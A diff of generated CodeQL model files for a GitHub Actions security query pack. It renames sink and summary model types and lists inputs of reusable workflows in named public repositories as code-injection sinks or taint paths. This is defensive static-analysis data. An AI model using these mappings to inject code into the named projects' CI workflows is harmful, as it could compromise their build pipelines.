a/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["element-hq/element-desktop/.github/workflows/build_windows.yaml", "*", "input.version", "code-injection", "generated"] - ["element-hq/element-desktop/.github/workflows/build_prepare.yaml", "*", "input.config", "code-injection", "generated"] @@ -11,6 +11,6 @@ extensions: - ["element-hq/element-desktop/.github/workflows/build_linux.yaml", "*", "input.version", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["element-hq/element-desktop/.github/workflows/build_prepare.yaml", "*", "input.deploy", "output.deploy", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml b/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml index 2a9e2f9fd1a..c80f8e732b6 100644 --- a/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["envoyproxy/envoy/.github/workflows/_load.yml", "*", "input.run-id", "output.run-id", "taint", "manual"] - ["envoyproxy/envoy/.github/workflows/_load.yml", "*", "input.check-name", "output.check-name", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml b/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml index 9f56abf2858..b85a11d81f2 100644 --- a/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["etcd-io/bbolt/.github/workflows/robustness_template.yaml", "*", "input.testTimeout", "code-injection", "generated"] - ["etcd-io/bbolt/.github/workflows/robustness_template.yaml", "*", "input.count", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml b/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml index 8c73342d5fe..f8102400cc7 100644 --- a/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["etcd-io/etcd/.github/workflows/tests-template.yaml", "*", "input.arch", "code-injection", "generated"] - ["etcd-io/etcd/.github/workflows/robustness-template.yaml", "*", "input.scenario", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml b/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml index 87253d88224..1af7b832203 100644 --- a/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["eventstore/eventstore/.github/workflows/build-reusable.yml", "*", "input.arch", "code-injection", "generated"] - ["eventstore/eventstore/.github/workflows/build-container-reusable.yml", "*", "input.container-runtime", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml b/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml index 9eb4c17cd3a..c0688a4a5e0 100644 --- a/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["expensify/app/.github/workflows/e2ePerformanceTests.yml", "*", "input.PR_NUMBER", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml b/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml index 860dcdcb43d..4e91308a004 100644 --- a/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["external-secrets/external-secrets/.github/workflows/publish.yml", "*", "input.image-tag", "code-injection", "generated"] - ["external-secrets/external-secrets/.github/workflows/publish.yml", "*", "input.tag-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml b/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml index 539edcd5891..bc42c619599 100644 --- a/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["facebook/create-react-app/.github/workflows/e2e-base.yml", "*", "input.testScript", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml b/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml index b1b37d967e9..68925b294bb 100644 --- a/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["facebookresearch/xformers/.github/workflows/wheels_upload_s3.yml", "*", "input.aws_s3_cp_extra_args", "code-injection", "generated"] - ["facebookresearch/xformers/.github/workflows/wheels_upload_s3.yml", "*", "input.s3_path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml b/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml index 51691edc1f9..c3ff42ed604 100644 --- a/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["falcosecurity/falco/.github/workflows/reusable_build_packages.yaml", "*", "input.build_type", "code-injection", "generated"] - ["falcosecurity/falco/.github/workflows/reusable_build_packages.yaml", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml b/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml index 3a14f6a879d..964436f33ca 100644 --- a/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["fastify/fastify/.github/workflows/citgm-package.yml", "*", "input.package", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml b/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml index c7f84e83db5..995940550e1 100644 --- a/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ferretdb/ferretdb/.github/workflows/_integration.yml", "*", "input.task", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml b/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml index 72383be71ca..93653f07819 100644 --- a/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["filecoin-project/venus/.github/workflows/common_go.yml", "*", "input.test_timeout", "code-injection", "generated"] - ["filecoin-project/venus/.github/workflows/common_go.yml", "*", "input.log_level", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml b/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml index 8b05adf053e..961070778cf 100644 --- a/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["firebase/firebase-unity-sdk/.github/workflows/update_versions.yml", "*", "input.triggered_by_callable", "code-injection", "generated"] - ["firebase/firebase-unity-sdk/.github/workflows/update_versions.yml", "*", "input.package_version_number", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml b/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml index 9eec959ade3..9f1cc82523c 100644 --- a/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["flarum/framework/.github/workflows/REUSABLE_backend.yml", "*", "input.monorepo_tests", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml b/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml index 835301ecc73..68babc09b6a 100644 --- a/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["fluent/fluent-bit/.github/workflows/call-windows-unit-tests.yaml", "*", "input.unstable", "code-injection", "generated"] - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/reuse_latest_release_binaries.yml", "*", "input.the_path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml b/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml index 9a99588239e..f4271e5424b 100644 --- a/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["flux-iac/tofu-controller/.github/workflows/targeted-test.yaml", "*", "input.pattern", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml b/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml index 12c370b33ad..f20f7997d3c 100644 --- a/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["flyteorg/flyte/.github/workflows/publish.yml", "*", "input.before-build", "code-injection", "generated"] - ["flyteorg/flyte/.github/workflows/integration.yml", "*", "input.component", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml b/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml index 0e03216fc69..da5617fd144 100644 --- a/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["foundatiofx/foundatio/.github/workflows/build-workflow.yml", "*", "input.org", "code-injection", "generated"] - ["foundatiofx/foundatio/.github/workflows/build-workflow.yml", "*", "input.solution", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml b/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml index 081378c9617..78821b4dad3 100644 --- a/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["freecad/freecad/.github/workflows/sub_wrapup.yml", "*", "input.previousSteps", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml b/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml index fcd9c292901..f0c9290ca22 100644 --- a/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["getpelican/pelican/.github/workflows/github_pages.yml", "*", "input.output-path", "code-injection", "generated"] - ["getpelican/pelican/.github/workflows/github_pages.yml", "*", "input.settings", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml b/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml index 19822c29fcd..21d23698931 100644 --- a/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["getporter/porter/.github/workflows/build_pipelinesrelease_template.yml", "*", "input.registry", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml index d0ccde698b1..ac38cac602d 100644 --- a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["getsentry/sentry-dart/.github/workflows/analyze.yml", "*", "input.panaThreshold", "code-injection", "generated"] - ["getsentry/sentry-dart/.github/workflows/analyze.yml", "*", "input.sdk", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml index 027da83e922..a9f87db955e 100644 --- a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["getsentry/sentry-unity/.github/workflows/sdk.yml", "*", "input.target", "code-injection", "generated"] - ["getsentry/sentry-unity/.github/workflows/android-smoke-test.yml", "*", "input.api-level", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml b/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml index a914aa631c3..99c706b0c28 100644 --- a/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["gitpod-io/gitpod/.github/workflows/jetbrains-auto-update-template.yml", "*", "input.productId", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml b/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml index d0fe6b0eff5..f8d0172d684 100644 --- a/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["gittools/gitversion/.github/workflows/_artifacts_linux.yml", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml index 3d3a4de2946..5afda471f8b 100644 --- a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["googlecloudplatform/magic-modules/.github/workflows/build-downstream.yml", "*", "input.repo", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml index 4c58af6969d..4e5ca50ccec 100644 --- a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["googlecloudplatform/nodejs-docs-samples/.github/workflows/test.yaml", "*", "input.path", "code-injection", "generated"] - ["googlecloudplatform/nodejs-docs-samples/.github/workflows/test.yaml", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml b/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml index 8629f279891..02801615bd5 100644 --- a/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["gravitational/teleport/.github/workflows/update-ami-ids.yaml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml b/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml index 4a6bbd77ec9..d808d612857 100644 --- a/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["gravitl/netmaker/.github/workflows/publish-docker.yml", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml b/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml index c22998ee52a..e543dc8b7f3 100644 --- a/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["h2oai/wave/.github/workflows/wave-bundle-docker-build-publish.yaml", "*", "input.build-version", "code-injection", "generated"] - ["h2oai/wave/.github/workflows/wave-bundle-docker-build-publish.yaml", "*", "input.wave-app-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml b/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml index c74922e61dc..891d902f470 100644 --- a/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hadashia/vcontainer/.github/workflows/update-version-number.yaml", "*", "input.dry-run", "code-injection", "generated"] - ["hadashia/vcontainer/.github/workflows/update-version-number.yaml", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml b/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml index c9c7e8318f7..334d64dfbec 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml", "*", "input.version", "output.docker-image-tag", "taint", "manual"] - ["hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml", "*", "input.version", "output.docker-image", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml index 169094c3eb3..2c600cd7f7d 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hashicorp/boundary/.github/workflows/test-cli-ui_oss.yml", "*", "input.artifact-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml index 6e4e4f4f1e9..cc6c4e620e6 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hashicorp/consul/.github/workflows/reusable-unit.yml", "*", "input.package-names-command", "code-injection", "generated"] - ["hashicorp/consul/.github/workflows/reusable-unit.yml", "*", "input.go-test-flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml index dbc26ef9f04..efbf050ddc9 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hashicorp/terraform-cdk/.github/workflows/unit.yml", "*", "input.package", "code-injection", "generated"] - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "input.gitUser", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml index c69de7cfcc2..9860bd3ab92 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hashicorp/terraform-provider-tfe/.github/workflows/jira-issue-sync.yml", "*", "input.issue-extra-fields", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml index 685b0b144c9..c160c29f6f6 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hashicorp/terraform/.github/workflows/build-terraform-cli.yml", "*", "input.product-version", "code-injection", "generated"] - ["hashicorp/terraform/.github/workflows/build-terraform-cli.yml", "*", "input.package-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml index 9e3fc5cdc4f..910715eece0 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hashicorp/vault/.github/workflows/test-run-enos-scenario-matrix.yml", "*", "input.sample-max", "code-injection", "generated"] - ["hashicorp/vault/.github/workflows/test-run-enos-scenario-matrix.yml", "*", "input.sample-name", "code-injection", "generated"] @@ -16,7 +16,7 @@ extensions: - ["hashicorp/vault/.github/workflows/test-enos-scenario-ui.yml", "*", "input.storage_backend", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["hashicorp/vault/.github/workflows/build-artifacts-ce.yml", "*", "input.vault-version-package", "output.testable-packages", "taint", "manual"] - ["hashicorp/vault/.github/workflows/build-artifacts-ce.yml", "*", "input.vault-revision", "output.testable-containers", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml index 4cd6cd8f591..f04e67670d3 100644 --- a/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["heroku/cli/.github/workflows/publish-npm.yml", "*", "input.isStableRelease", "code-injection", "generated"] - ["heroku/cli/.github/workflows/promote.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml b/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml index 01726410e18..3d5fa057987 100644 --- a/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml @@ -1,13 +1,13 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hitobito/hitobito/.github/workflows/sbom.yml", "*", "input.project_name", "code-injection", "generated"] - ["hitobito/hitobito/.github/workflows/sbom.yml", "*", "input.dependency_track_url", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["hitobito/hitobito/.github/workflows/stage-settings.yml", "*", "input.stage", "output.release_stage", "taint", "manual"] - ["hitobito/hitobito/.github/workflows/stage-settings.yml", "*", "input.repository", "output.repo_url", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml b/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml index 90e61bcf11a..31d0e691e7f 100644 --- a/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["home-assistant/operating-system/.github/workflows/test.yaml", "*", "input.version", "code-injection", "generated"] - ["home-assistant/operating-system/.github/workflows/artifacts-index.yaml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml b/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml index b4e1ff8155a..5f9da314f90 100644 --- a/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "input.windowsBuildArgs", "code-injection", "generated"] - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", 